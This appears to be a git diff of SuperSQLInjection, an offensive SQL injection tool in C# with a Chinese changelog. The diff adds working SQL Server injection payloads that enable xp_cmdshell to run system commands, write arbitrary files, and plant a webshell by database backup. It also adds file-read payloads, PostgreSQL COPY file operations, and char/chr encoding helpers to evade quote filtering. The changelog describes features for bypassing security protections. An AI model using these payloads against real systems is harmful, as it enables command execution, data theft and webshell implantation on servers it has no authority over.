@@ -208,7 +207,17 @@ namespace SuperSQLInjection.payload
|
|||||||
return data;
|
return data;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// 反射条调用,加载显示支持的文件操作
|
||||||
|
/// </summary>
|
||||||
|
/// <returns></returns>
|
||||||
|
public static List<String> getShowCanDoFile()
|
||||||
|
{
|
||||||
|
List<String> list = new List<String>();
|
||||||
|
list.Add("PostgreSQL Copy写文件");
|
||||||
|
list.Add("PostgreSQL Copy读文件");
|
||||||
|
return list;
|
||||||
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -69,17 +69,23 @@ namespace SuperSQLInjection.payload
|
|||||||
|
|
||||||
|
|
||||||
//cmd
|
//cmd
|
||||||
public static String createTable = " 1=1;drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
|
public static String createTableAndExecCmd = " 1=1;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
|
||||||
public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
|
public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
|
||||||
public static String cmdDataCount = "(select (select count(*) from ssqlinjection))";
|
public static String cmdDataCount = "(select (select count(*) from ssqlinjection))";
|
||||||
public static String dropTable = " 1=1;drop table ssqlinjection;select 1 where 1=1 ";
|
public static String dropTable = " 1=1;drop table ssqlinjection;select 1 where 1=1 ";
|
||||||
|
|
||||||
|
public static String dropWriteFileBackUpTableAndDropDB = " 1=1;drop table [ssqlinjection]..[data];drop database ssqlinjection;select 1 where 1=1 ";
|
||||||
|
|
||||||
|
public static String createWriteFileBackUpTable = " 1=1;create table [ssqlinjection]..[data] (content image);select 1 where 1=1 ";
|
||||||
|
|
||||||
|
public static String createWriteFileBackUpDB = " 1=1;create database ssqlinjection;select 1 where 1=1 ";
|
||||||
|
|
||||||
|
|
||||||
//文件读写
|
//文件读写
|
||||||
public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;select 1 where 1=1 ";
|
public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;select 1 where 1=1 ";
|
||||||
public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;select 1 where 1=1 ";
|
public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;select 1 where 1=1 ";
|
||||||
public static String witeFileByBackDataBase = " 1=1;drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
|
public static String witeFileByBackDataBase = " 1=1;insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
|
||||||
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
|
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
|
||||||
|
|
||||||
//读文件的的payload
|
//读文件的的payload
|
||||||
public static String file_content = "(select data from ssqlinjection)";
|
public static String file_content = "(select data from ssqlinjection)";
|
||||||
@@ -259,5 +265,18 @@ namespace SuperSQLInjection.payload
|
|||||||
return payload;
|
return payload;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// 反射条调用,加载显示支持的文件操作
|
||||||
|
/// </summary>
|
||||||
|
/// <returns></returns>
|
||||||
|
public static List<String> getShowCanDoFile()
|
||||||
|
{
|
||||||
|
List<String> list = new List<String>();
|
||||||
|
list.Add("SQLServer FileSystemObject写文件");
|
||||||
|
list.Add("SQLServer Sp_MakeWebTask写文件");
|
||||||
|
list.Add("SQLServer 备份写WebShell(有多余数据)");
|
||||||
|
list.Add("SQLServer FileSystemObject读文件");
|
||||||
|
return list;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -275,12 +275,25 @@ namespace tools
|
|||||||
/// <returns></returns>
|
/// <returns></returns>
|
||||||
public static String convertToString(String[] strs){
|
public static String convertToString(String[] strs){
|
||||||
|
|
||||||
|
return convertToString(strs,false);
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
public static String convertToString(String[] strs,bool appendNewLine)
|
||||||
|
{
|
||||||
|
|
||||||
StringBuilder sb = new StringBuilder();
|
StringBuilder sb = new StringBuilder();
|
||||||
foreach(String s in strs){
|
foreach (String s in strs)
|
||||||
|
{
|
||||||
sb.Append(s);
|
sb.Append(s);
|
||||||
|
if (appendNewLine) {
|
||||||
|
sb.Append("\r\n");
|
||||||
|
}
|
||||||
}
|
}
|
||||||
return sb.ToString();
|
return sb.ToString();
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
||||||
/// <summary>
|
/// <summary>
|
||||||
@@ -383,7 +396,7 @@ namespace tools
|
|||||||
/// <param name="isUseCode">是否使用状态码判断</param>
|
/// <param name="isUseCode">是否使用状态码判断</param>
|
||||||
/// <param name="key">关键字</param>
|
/// <param name="key">关键字</param>
|
||||||
/// <returns></returns>
|
/// <returns></returns>
|
||||||
public static Boolean isTrue(ServerInfo server,String key,Boolean reverKey,KeyType keyType)
|
public static Boolean isTrue(ServerInfo server,String key,Boolean reverKey,KeyType keyType,int trueHTTPCode)
|
||||||
{
|
{
|
||||||
switch (keyType) {
|
switch (keyType) {
|
||||||
|
|
||||||
@@ -392,17 +405,30 @@ namespace tools
|
|||||||
//用关键字判断
|
//用关键字判断
|
||||||
if (server.body.Length > 0 && server.body.IndexOf(key)!=-1)
|
if (server.body.Length > 0 && server.body.IndexOf(key)!=-1)
|
||||||
{
|
{
|
||||||
;
|
|
||||||
if (reverKey)
|
if (reverKey)
|
||||||
{
|
{
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
return true;
|
else
|
||||||
|
{
|
||||||
|
//判断httpcode是否一致
|
||||||
|
if (trueHTTPCode != 0 && server.code == trueHTTPCode) {
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
return false;
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
if (reverKey)
|
if (reverKey)
|
||||||
{
|
{
|
||||||
|
//判断httpcode是否一致
|
||||||
|
if (trueHTTPCode != 0 && server.code == trueHTTPCode)
|
||||||
|
{
|
||||||
|
return true;
|
||||||
|
}
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
return false;
|
return false;
|
||||||
@@ -551,6 +577,51 @@ namespace tools
|
|||||||
return "";
|
return "";
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// byte[]转hex,udf调用
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="bytes"></param>
|
||||||
|
/// <returns></returns>
|
||||||
|
public static String bytesToHex(byte[] bytes)
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
StringBuilder sb = new StringBuilder();
|
||||||
|
if (bytes != null && bytes.Length > 0) {
|
||||||
|
foreach (Byte s in bytes)
|
||||||
|
{
|
||||||
|
sb.Append(s.ToString("x").PadLeft(2, '0'));
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
return sb.ToString();
|
||||||
|
}
|
||||||
|
catch (Exception e)
|
||||||
|
{
|
||||||
|
Tools.SysLog("bytesToHex转换错误!" + e.Message);
|
||||||
|
}
|
||||||
|
return "";
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// byte[]转hex,udf调用
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="bytes"></param>
|
||||||
|
/// <returns></returns>
|
||||||
|
public static String FileToHex(String path,Encoding encode)
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
byte[] filedata=FileTool.readFileToByte(path, encode);
|
||||||
|
return bytesToHex(filedata);
|
||||||
|
}
|
||||||
|
catch (Exception e)
|
||||||
|
{
|
||||||
|
Tools.SysLog("FileToHex转换错误!" + e.Message);
|
||||||
|
}
|
||||||
|
return "";
|
||||||
|
}
|
||||||
|
|
||||||
/// <summary>
|
/// <summary>
|
||||||
/// 转换chr供postgresql替换库名,防止单引号被拦截或过滤
|
/// 转换chr供postgresql替换库名,防止单引号被拦截或过滤
|
||||||
/// </summary>
|
/// </summary>
|
||||||
@@ -558,24 +629,70 @@ namespace tools
|
|||||||
/// <param name="encode"></param>
|
/// <param name="encode"></param>
|
||||||
/// <returns></returns>
|
/// <returns></returns>
|
||||||
public static String strToChr(String str, String encode)
|
public static String strToChr(String str, String encode)
|
||||||
|
{
|
||||||
|
return strToChrOrChar(str, "chr", "||", encode);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
public static String strToChrOrChar(String str, String charFunction,String charConcatStr,String encode)
|
||||||
{
|
{
|
||||||
try
|
try
|
||||||
{
|
{
|
||||||
|
|
||||||
StringBuilder sb = new StringBuilder("(");//存储转换后的编码
|
StringBuilder sb = new StringBuilder();
|
||||||
Byte[] strByte = Encoding.GetEncoding(encode).GetBytes(str);
|
Byte[] strByte = Encoding.GetEncoding(encode).GetBytes(str);
|
||||||
foreach (Byte s in strByte)
|
foreach (Byte s in strByte)
|
||||||
{
|
{
|
||||||
sb.Append("chr("+s+ ")||");
|
sb.Append(charFunction+"(" + s + ")"+ charConcatStr);
|
||||||
}
|
}
|
||||||
return sb.Remove(sb.Length-2,2).Append(")").ToString();
|
return sb.Remove(sb.Length - charConcatStr.Length, charConcatStr.Length).ToString();
|
||||||
}
|
}
|
||||||
catch (Exception e)
|
catch (Exception e)
|
||||||
{
|
{
|
||||||
Tools.SysLog("strToChr错误!" + e.Message);
|
Tools.SysLog("strToChrOrChar错误!" + e.Message);
|
||||||
}
|
}
|
||||||
return "";
|
return "";
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
public static String chrOrCharToStr(String str, String charFunction, String encode)
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
String[] chars = str.Split(' ');
|
||||||
|
if (chars.Length > 0) {
|
||||||
|
|
||||||
|
Byte[] bs = new Byte[chars.Length];
|
||||||
|
int index = 0;
|
||||||
|
foreach (String s in chars)
|
||||||
|
{
|
||||||
|
String cs = s.Replace(charFunction,"").Replace(charFunction + "(", "").Replace(charFunction + ")", "");
|
||||||
|
Byte b = (Byte)Tools.convertToInt(cs);
|
||||||
|
bs[index] = b;
|
||||||
|
index++;
|
||||||
|
}
|
||||||
|
return Encoding.GetEncoding(encode).GetString(bs);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
catch (Exception e)
|
||||||
|
{
|
||||||
|
Tools.SysLog("strToChrOrChar错误!" + e.Message);
|
||||||
|
}
|
||||||
|
return "";
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// 转换chr供SQLServer替换库名,防止单引号被拦截或过滤
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="str"></param>
|
||||||
|
/// <param name="encode"></param>
|
||||||
|
/// <returns></returns>
|
||||||
|
public static String strToChar(String str, String encode)
|
||||||
|
{
|
||||||
|
return strToChrOrChar(str, "char", "+", encode);
|
||||||
|
}
|
||||||
public static int UnicodeInt2UTF8Int(int UnicodeInt)
|
public static int UnicodeInt2UTF8Int(int UnicodeInt)
|
||||||
{
|
{
|
||||||
if (UnicodeInt < 128)
|
if (UnicodeInt < 128)
|
||||||
|
|||||||
@@ -137,7 +137,7 @@ namespace tools
|
|||||||
|
|
||||||
}
|
}
|
||||||
//读取文件
|
//读取文件
|
||||||
public static Byte[] readFileToByte(String path,int a)
|
public static Byte[] readFileToByte(String path,Encoding encode)
|
||||||
{
|
{
|
||||||
Byte[] buffer = null;
|
Byte[] buffer = null;
|
||||||
FileStream fs_dir=null;
|
FileStream fs_dir=null;
|
||||||
@@ -145,7 +145,7 @@ namespace tools
|
|||||||
try
|
try
|
||||||
{
|
{
|
||||||
fs_dir = new FileStream(path, FileMode.Open, FileAccess.Read);
|
fs_dir = new FileStream(path, FileMode.Open, FileAccess.Read);
|
||||||
BinaryReader br = new BinaryReader(fs_dir);
|
BinaryReader br = new BinaryReader(fs_dir, encode);
|
||||||
int len = (int)fs_dir.Length;
|
int len = (int)fs_dir.Length;
|
||||||
|
|
||||||
buffer = new byte[len];
|
buffer = new byte[len];
|
||||||
|
|||||||
50
update.txt
50
update.txt
@@ -1,4 +1,52 @@
|
|||||||
20181117 V1.0 正式版---
|
20181221 V1.0 正式版---
|
||||||
|
修复盲注关键字判断机制,自动识别时,关键字相同且状态码相同才认为是true页面,解决在部分情况下可能出现错误500页面也存在同样关键字的问题。
|
||||||
|
修改SQLServer查询列时,使用char函数方式,避免单引号被过滤导致无法获取列名的问题。
|
||||||
|
修复SQLServer 执行命令,读写文件时,可能由于语句报错而导致读写文件失败的问题,优化提高成功率。
|
||||||
|
修复betweent and绕过时,将16进制字符替换了,导致语句错误而无法获取数据的问题。
|
||||||
|
修复自动识别在某些情况下跳过了错误显示注入检查。
|
||||||
|
修复Union注入重复发包判断列情况。
|
||||||
|
修复自动识别注入,在部分情况下无法正确判断数据库类型的问题。
|
||||||
|
修改爆出注入配置文件,降低漏报。
|
||||||
|
优化自动识别注入,如果程序判断支持盲注,会自动尝试使用order by去判断页面列数,提高Union注入检查的速度。
|
||||||
|
新增支持注入PostgreSQL文件读写功能。
|
||||||
|
|
||||||
|
20181216 V1.0 正式版---
|
||||||
|
修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。
|
||||||
|
修复优化自动识别注入漏报和选择类型错误的问题。
|
||||||
|
修复bool延时注入时,获取数据判断数据大小方式不正确的问题。
|
||||||
|
修复错误显示注入获取数据时,数据可能被HTML编码或转义到导致数据不正确的问题。
|
||||||
|
修复延时注入在正常页面响应速度非常快的情况下,由于计数器可能有误差,导致判断值不正确,而无法正确获取数据(设置了20*time毫秒的误差值)。
|
||||||
|
修复读取文件,执行命令无法使用延时判断问题。
|
||||||
|
优化配置文件。
|
||||||
|
新增支持注入PostgreSQL,目前可获取数据,执行命令和文件操作稍后版本更新。
|
||||||
|
|
||||||
|
20181212 V1.0 正式版---
|
||||||
|
修复MySQL盲注时,在某些情况下,获取的每列数据可能不对应的问题。
|
||||||
|
修复Oracle盲注获取数据的语句。
|
||||||
|
修复盲注时,提示需要配置Union注入问题。
|
||||||
|
优化配置文件,降低数据库类型漏报,增加oracle获取SYS_HASH的语句
|
||||||
|
|
||||||
|
20181210 V1.0 正式版---
|
||||||
|
修复上个版本betweent and绕过时,处理不当导致部分情况可能出现语句错误问题和无法自动识别注入问题。
|
||||||
|
优化代码。
|
||||||
|
|
||||||
|
20181209 V1.0 正式版---
|
||||||
|
修复上个版本betweent and绕过时,处理不当导致部分情况可能出现语句错误问题。
|
||||||
|
优化代码。
|
||||||
|
|
||||||
|
20181206 V1.0 正式版---
|
||||||
|
修改mysql获取的环境的配置文件,增加hash字段名为authentication_string的查询。
|
||||||
|
修复使用了betweent and饶过时,显错注入无法获取数据的情况。
|
||||||
|
修复MySQL显错注入,获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。
|
||||||
|
|
||||||
|
20181205 V1.0 正式版---
|
||||||
|
优化注入配置文件,降低误报和漏报。
|
||||||
|
优化执行命令,文件读取模块解决部分情况无法执行命令或无法读取文件的情况。
|
||||||
|
修复SQLServer通过错误显示方式无法获取数据的情况。
|
||||||
|
优化部分代码。
|
||||||
|
增加自动识别注入记录,可将URL的每一个参数存在的盲注、报错注入、Union注入都记录下来,可灵活选择对应的注入类型。
|
||||||
|
|
||||||
|
20181119 V1.0 正式版---
|
||||||
优化HTTP发包,将http header和body分开发送,在某些情况下可以绕过安全防护。
|
优化HTTP发包,将http header和body分开发送,在某些情况下可以绕过安全防护。
|
||||||
修复获取数据时,在某些情况下,由于选择列变少,排序列未更新,导致会出现程序排序异常的情况。
|
修复获取数据时,在某些情况下,由于选择列变少,排序列未更新,导致会出现程序排序异常的情况。
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user